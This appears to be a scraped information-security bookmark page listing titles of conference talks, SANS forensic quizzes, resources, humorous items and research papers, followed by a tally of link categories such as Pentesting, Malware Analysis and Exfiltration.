- Hack.lu 2021 Stonks Socket
- How to R&D hacking toys for fun & no-profit
- Security Guidelines for Congressional Campaigns
- From Assembly to JavaScript and back
- ARM-based IoT Exploit Development
- Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito
- The Art of De-obfuscation
- Smartphone Privacy
- Fun with LDAP and Kerberos- in AD environments
- Analysis and recommendations for standardization in penetration testing and vulnerability assessment
- The Second Crypto War—What's Different Now
- Malware: Anti-forensics
- The 35C3 halfnarp
- SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
- Mojave's Sandbox is Leaky
- Code Obfuscation 10**2+(2*a+3)%2
- DeepState - 2018-paper.pdf): DeepState: Symbolic Unit Testing for C and C++
- Hardware Memory Tagging to make C/C++ memory safe(r)
- wallet.fail
- Making C Less Dangerous in the Linux kernel
- A Practical Approach to Purple Teaming
- The Advanced Threats Evolution: REsearchers Arm Race
- The Beginner Malware Analysis Course + VirusBay Access
- Venturing into the Dark - a review of Dark Side Ops 2: Adversary Simulation
- Expert voices disinvited from CyberCon
- Offensive Development - Exploitation Tradecraft in an EDR World x33fcon 2020
- The AVAR International Conference is back!
- Japan Security Analyst Conference Virtual Edition
- Developing Secure Systems Summit (DS3)
- MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE - Amsterdam
- Securing Cyber-Physical Systems: moving beyond fear
- TheGlasshouseCtr
- Open Source Security Day on Google Open Source Live
- 30th USENIX Security Symposium
- The Hijackers Guide to the Galaxy:Off-path Taking over Internet Resources
- Reverse Engineering - - Thomas Dullien (“Halvar Flake”)
- JavaDeserH2HC
- SAFEMODE - safemode/dc-safemode-villages.html), [BADGE](https://www.defcon.org/html/defcon-safemode/dc-safemode-badge.html), [ics-forum](https://forum.defcon.org/node/232698)
- DeepState - 2018-paper.pdf): DeepState: Symbolic Unit Testing for C and C++
-
Sans
- April 2021 Forensic Quiz - duncan/April-2021-forensic-quiz)
- May 2021 Forensic Contest - duncan/May-2021-forensic-quiz) [answer](https://isc.sans.edu/forums/diary/May+2021+Forensic+Contest+Answers+and+Analysis/27430/)
- June 2021 Forensic Contest - 2021-forensic-quiz](https://github.com/brad-duncan/June-2021-forensic-quiz) [Network Forensics on Azure VMs (Part #2)](https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/).
- Quick Analysis of a Modular InfoStealer
- Example of Cleartext Cobalt Strike Traffic
- "Serverless" Phishing Campaign
- SANS Virtual Summits Will Be FREE for the Community in 2021
- Random Forests: Still Useful?
- June 2021 Forensic Contest - 2021-forensic-quiz](https://github.com/brad-duncan/June-2021-forensic-quiz) [Network Forensics on Azure VMs (Part #2)](https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/).
-
-
Sources
-
Sans
- FIDO ECDAA Algorithm
- stamparm
- gabrielmachado
- Damn Vulnerable Web Application Docker container
- vvmlist
- PwnLab: init
- Mamont's open FTP Index
- Free Training: New Certified Learning Paths
- Daily Information Security Podcast ("StormCast")
- I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster - Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization.
- Exodus Research Community
- 2021 Annual Threat Assessment
- EP 67: THE BIG HOUSE
- List of Helpful Information Security Multimedia
- hasherezade's 1001 nights
- How to start RE/malware analysis? | hasherezade's 1001 nights
- Catálogo de Fraudes
- Wrong Secrets
-
-
Fun
-
Sans
- InfoSec BS Bingo
- Attrition.org
- rot8000
- Reverse Engineering Pokémon GO Plus
- grugq quotes
- Pivots & Payloads Board Game
- Chess Steganography
- Enigma, the Bombe, and Typex
- Enigma machine
- How I hacked modern Vending Machines
- A better zip bomb
- Enigma I - emulator).
- FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases
- pivoting
- "Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
- THE BEIRUT BANK JOB
- types of papers
- Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data.
- How the Xbox 360 DVD Security was Defeated - MVG
- I was going through my notes this morning and thought CVE-2021-21985 was important to cover
- APPSEC EZINE
- ZeroVer: 0-based Versioning
- The Cartoon Guide to Computer Science
- LENS CALCULATOR
- An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
- What is von Clausewitz centers of gravity (cogs) concept?
- Place that a stealth figther was caught on gmaps
- High-Security Mechanical Locks
- Tetsuji
- Comparative Study of Anti-cheat Methods in Video Games
- Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil
- InfoSec BS Bingo
-
-
Articles
-
Sans
- [1808.00659
- [1809.08325
- DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
- The Hunt for 3ve
- Page Cache Attacks - agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
- Identification and Illustration of Insecure Direct Object References and their Countermeasures
- China’s Maxim
- Listen to Your Key: Towards Acoustics-based Physical Key Inference
- Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
- Everything Old is New Again: Binary Security of WebAssembly
- Discovering Suspicious APT Behaviors by Analyzing DNS Activities
- Harvard Belfer National Cyber Power Index 2020
- Quantum Blockchain using entanglement in time
- Reflections on Trusting Trust
- I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches
- BIAS: Bluetooth Impersonation AttackS
- LOKI: Hardening Code Obfuscation Against Automated Attacks
- FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications
- Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
- The Accidental Altruist: Inferring Altruism from an Extraterrestrial Signal
- Quantum Blockchain using entanglement in time
- LOKI: Hardening Code Obfuscation Against Automated Attacks
- China’s Maxim
- I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches
- The Accidental Altruist: Inferring Altruism from an Extraterrestrial Signal
- Interstellar communication. IX. Message decontamination is impossible
-
-
psyops
Categories
Pentesting
1,314
Operating Systems
507
Blue Team
434
Malware Analysis
302
Secure Programming
223
Tools
165
Reverse Engineering
163
Archs
141
Resources
117
Exfiltration
113
Forensics
102
Mobile
78
Browsers
77
Links
75
CTFs
69
General
54
Hardening
48
DNS
40
Fun
32
Articles
26
Phishing
22
Risk Assessment and Vulnerability Management
18
Sources
18
Privacy
17
Phreak
14
Radio
14
Credentials
13
CVEs
9
ICS (SCADA)
9
psyops
7
Social Engineering
6
Books
6
Patching
1
Sub Categories